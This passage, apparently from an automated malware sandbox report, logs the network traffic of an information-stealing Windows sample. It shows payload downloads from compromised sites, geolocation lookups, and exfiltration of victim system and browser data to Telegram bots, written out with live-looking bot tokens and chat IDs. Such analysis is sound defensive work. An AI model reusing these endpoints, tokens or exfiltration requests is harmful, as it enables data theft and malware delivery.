F%8E%AE%20Steam%20=%3E%20%E2%9D%8C%0A%20==================%0A%20DOMAINS%20DETECTED:%0A%20-%20 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dc9e6ac9ab89e3Host: api.telegram.orgContent-Length: 672709Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.com
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: ip-api.com
                      Source: unknownDNS query: name: icanhazip.com
                      Source: unknownDNS query: name: icanhazip.com
                      Source: unknownDNS query: name: ip-api.com
                      Source: global trafficHTTP traffic detected: GET /event.php HTTP/1.1User-Agent: Mozilla 5/0Host: auth.xn--conbase-sfb.xyzCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /event.php HTTP/1.1User-Agent: Mozilla 5/0Host: auth.xn--conbase-sfb.xyzCache-Control: no-cache
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.232.249.204
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A187A94 InternetOpenUrlW,InternetOpenUrlW,InternetCloseHandle,CreateFileW,InternetCloseHandle,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00007FF68A187A94
                      Source: global trafficHTTP traffic detected: GET /event.php HTTP/1.1User-Agent: Mozilla 5/0Host: auth.xn--conbase-sfb.xyzCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendMessage?chat_id=5795480469&text=%F0%9F%A6%A0%201.0.0%0A%F0%9F%A4%96%20ID:%20%20%3Ccode%3EF8C0C6DCE8981733A6%3C/code%3E%0D%0A%F0%9F%91%A4%20User:%20%3Ccode%3Euser/134349%3C/code%3E%0D%0A%F0%9F%93%85%20%D0%94%D0%B0%D1%82%D0%B0%20%D1%83%D1%81%D1%82%D0%B0%D0%BD%D0%BE%D0%B2%D0%BA%D0%B8/%D0%B7%D0%B0%D1%80%D0%B0%D0%B6%D0%B5%D0%BD%D0%B8%D1%8F:%20%3Ccode%3E06/07/2024%2011:27:15%3C/code%3E%0D%0A%E2%9A%99%EF%B8%8F%20%3Ccode%3EC:%5CUsers%5Cuser%5CAppData%5CLocal%5CTemp%5C3CBD.tmp.Installer.exe%3C/code%3E%0D%0A%E2%9A%96%EF%B8%8F%20%D0%92%D0%B5%D1%81%20%D0%B1%D0%B8%D0%BB%D0%B4%D0%B0%20%3Ccode%3E617%20KB%3C/code%3E%0D%0A%F0%9F%97%92%20%D0%9A%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8%20%D0%BD%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D1%8B%20%D0%B8%20%D0%B7%D0%B0%D0%BC%D0%B5%D0%BD%D0%B5%D0%BD%D1%8B%20%D0%B2%20%D1%84%D0%B0%D0%B9%D0%BB%D0%B0:%20%0A%0D%0A%D0%9D%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D0%BD%D1%8B%D0%B5%20%D0%BA%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8%20%D0%B2%20%D0%B1%D1%83%D1%84%D0%B5%D1%80%D0%B5%20%D0%BE%D0%B1%D0%BC%D0%B5%D0%BD%D0%B0:%0D%0A%0A%0D%0A%D0%97%D0%B0%D0%BC%D0%B5%D0%BD%D0%B8%D0%BB%D0%B8%20%D0%BD%D0%B0%20%D0%BA%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8:%0D%0A%0A&parse_mode=html HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
                      Source: global trafficHTTP traffic detected: GET /bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendMessage?chat_id=5795480469&text=%F0%9F%A6%A0%201.0.0%0A%F0%9F%A4%96%20ID:%20%20%3Ccode%3EF8C0C6DCE8981733A6%3C/code%3E%0D%0A%F0%9F%91%A4%20User:%20%3Ccode%3Euser/134349%3C/code%3E%0D%0A%F0%9F%93%85%20%D0%94%D0%B0%D1%82%D0%B0%20%D1%83%D1%81%D1%82%D0%B0%D0%BD%D0%BE%D0%B2%D0%BA%D0%B8/%D0%B7%D0%B0%D1%80%D0%B0%D0%B6%D0%B5%D0%BD%D0%B8%D1%8F:%20%3Ccode%3E06/07/2024%2011:27:15%3C/code%3E%0D%0A%E2%9A%99%EF%B8%8F%20%3Ccode%3EC:%5CProgramData%5CKMSAuto%5Caccc.exe%3C/code%3E%0D%0A%E2%9A%96%EF%B8%8F%20%D0%92%D0%B5%D1%81%20%D0%B1%D0%B8%D0%BB%D0%B4%D0%B0%20%3Ccode%3E617%20KB%3C/code%3E%0D%0A%F0%9F%97%92%20%D0%9A%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8%20%D0%BD%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D1%8B%20%D0%B8%20%D0%B7%D0%B0%D0%BC%D0%B5%D0%BD%D0%B5%D0%BD%D1%8B%20%D0%B2%20%D1%84%D0%B0%D0%B9%D0%BB%D0%B0:%20%0A%0D%0A%D0%9D%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D0%BD%D1%8B%D0%B5%20%D0%BA%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8%20%D0%B2%20%D0%B1%D1%83%D1%84%D0%B5%D1%80%D0%B5%20%D0%BE%D0%B1%D0%BC%D0%B5%D0%BD%D0%B0:%0D%0A%0A%0D%0A%D0%97%D0%B0%D0%BC%D0%B5%D0%BD%D0%B8%D0%BB%D0%B8%20%D0%BD%D0%B0%20%D0%BA%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8:%0D%0A%0A&parse_mode=html HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
                      Source: global trafficHTTP traffic detected: GET /event.php HTTP/1.1User-Agent: Mozilla 5/0Host: auth.xn--conbase-sfb.xyzCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
                      Source: global trafficHTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
                      Source: global trafficHTTP traffic detected: GET /bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202024-07-06%207:27:22%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20134349%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%201BUBDD%0ARAM:%204095MB%0AHWID:%209C8FCB6779%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
                      Source: global trafficHTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202024-07-06%207:27:25%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20134349%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%201BUBDD%0ARAM:%204095MB%0AHWID:%209C8FCB6779%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
                      Source: global trafficHTTP traffic detected: GET /raw/7B75u64B HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/7B75u64B HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /api/update.pack HTTP/1.1User-Agent: NuclearBotHost: auth.xn--conbase-sfb.xyzCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /api/update2.pack HTTP/1.1User-Agent: NuclearBotHost: auth.xn--conbase-sfb.xyzCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /Installer.exe HTTP/1.1Host: www.igenius.orgPragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: CasperSecurity
                      Source: global trafficHTTP traffic detected: GET /Server.exe HTTP/1.1Host: hrdc.pkPragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: CasperSecurity
                      Source: global trafficHTTP traffic detected: GET /Server.exe HTTP/1.1Host: www.igenius.orgPragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: CasperSecurity
                      Source: global trafficHTTP traffic detected: GET /Server.exe HTTP/1.1Host: www.igenius.orgPragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: CasperSecurity
                      Source: global trafficHTTP traffic detected: GET /Client.exe HTTP/1.1Host: www.igenius.orgPragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: CasperSecurity
                      Source: global trafficHTTP traffic detected: GET /update.exe HTTP/1.1Host: www.igenius.orgPragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: CasperSecurity
                      Source: global trafficHTTP traffic detected: GET /update.exe HTTP/1.1Host: www.igenius.orgPragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: CasperSecurity
                      Source: global trafficHTTP traffic detected: GET /wp-admin/css/colors/ocean/grab.exe HTTP/1.1Host: www.westnilebirdingandsafari.comPragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: CasperSecurity
                      Source: global trafficHTTP traffic detected: GET /aaa.exe HTTP/1.1Host: www.igenius.orgPragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: CasperSecurity
                      Source: global trafficHTTP traffic detected: GET /build.exe HTTP/1.1Host: www.igenius.orgPragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: CasperSecurity
                      Source: global trafficHTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.com
                      Source: global trafficDNS traffic detected: DNS query: auth.xn--conbase-sfb.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.igenius.org
                      Source: global trafficDNS traffic detected: DNS query: hrdc.pk
                      Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                      Source: global trafficDNS traffic detected: DNS query: dl.dropboxusercontent.com
                      Source: global trafficDNS traffic detected: DNS query: freegeoip.app
                      Source: global trafficDNS traffic detected: DNS query: ipbase.com
                      Source: global trafficDNS traffic detected: DNS query: www.westnilebirdingandsafari.com
                      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                      Source: global trafficDNS traffic detected: DNS query: ip-api.com
                      Source: global trafficDNS traffic detected: DNS query: 205.12.2.0.in-addr.arpa
                      Source: global trafficDNS traffic detected: DNS query: icanhazip.com
                      Source: global trafficDNS traffic detected: DNS query: api.mylnikov.org
                      Source: global trafficDNS traffic detected: DNS query: pastebin.com
                      Source: unknownHTTP traffic detected: POST /bot7203427100:AAE4oxY4yahcr0ruK5AXnOIUYn1d9UmUZqs/sendDocument?chat_id=-4206528371&caption=====%20RL%20STEALER%20====%20%0A%E2%8F%B0%20Date%20=%3E%2007/06/2024%207:27%0A%F0%9F%92%BBSystem%20=%3E%20Windows%2010%20Pro%20(64%20Bit)%0A%F0%9F%91%A4%20User%20=%3E%20user%0A%F0%9F%86%94%20PC%20=%3E%20134349%0A%F0%9F%8F%B4%20Country%20=%3E%20[United%20States]%0A%F0%9F%94%8D%20IP%20=%3E%208.46.123.33%0A%F0%9F%93%9D%20Language%20=%3E%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0A%F0%9F%94%93%20Antivirus%20=%3E%20Windows%20Defender.%0A%20====%7B%20User%20Data%20%7D====%0A%F0%9F%93%82%20FileGrabber%20=%3E%2081%0A%F0%9F%93%A6%20Telegram%20=%3E%20%E2%9D%8C%0A%F0%9F%92%B8%20Wallets%20=%3E%20%E2%9D%8C%0A%F0%9F%92%AC%20Discord%20=%3E%20%E2%9D%8C%0A%F0%9F%93%A1%20FileZilla:%20%E2%9D%8C%0A%20VimeWorld%20=%3E%20%E2%9D%8C%0A%20====%7B%20VPN%20%7D====%0A%20%E2%88%9F%20NordVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20OpenVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20ProtonVPN%20=%3E%20%E2%9D%8C%0A%20====%7B%20Browsers%20Data%20%7D====%0A%F0%9F%97%9D%20Passwords%20=%3E%200%0A%F0%9F%95%91%20History%20=%3E%209%0A%F0%9F%8D%AA%20Cookies%20=%3E%200%0A%F0%9F%93%9D%20AutoFills%20=%3E%200%0A%F0%9F%92%B3%20CC%20=%3E%200%0A%20====%7B%20Gaming%20%7D====%0A%20%F0%9F%8E%AE%20Steam%20=%3E%20%E2%9D%8C%0A%20==================%0A%20DOMAINS%20DETECTED:%0A%20-%20 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dc9ea4f458eb80Host: api.telegram.orgContent-Length: 674280Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:27:21 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: 67cfd327a89144d898cb8e260c519356Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:27:21 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: 070ae673771847d5ae90f26a1e675131Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Jul 2024 11:27:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeAge: 0Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; fwd=missVary: Accept-EncodingX-Nf-Request-Id: 01J23WRXZC0BM4165B5GPY1TFECF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6UZrlvMPaDSEnXkSG0na44T4RaaVoVJuAy5tb8vAOvgyXsnn5QpS51%2B4%2Fh97bvolDxS4QcDEQ0h7X83MUaaO%2Fo%2BrE6HS9n%2FoXC4HgS5RM48xBA5mi2FRCMwRMN44"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89ef3ec62affc454-EWRalt-svc: h3=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:27:23 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: 6246558552fc497ea997b7ceeb858b05Connection: close
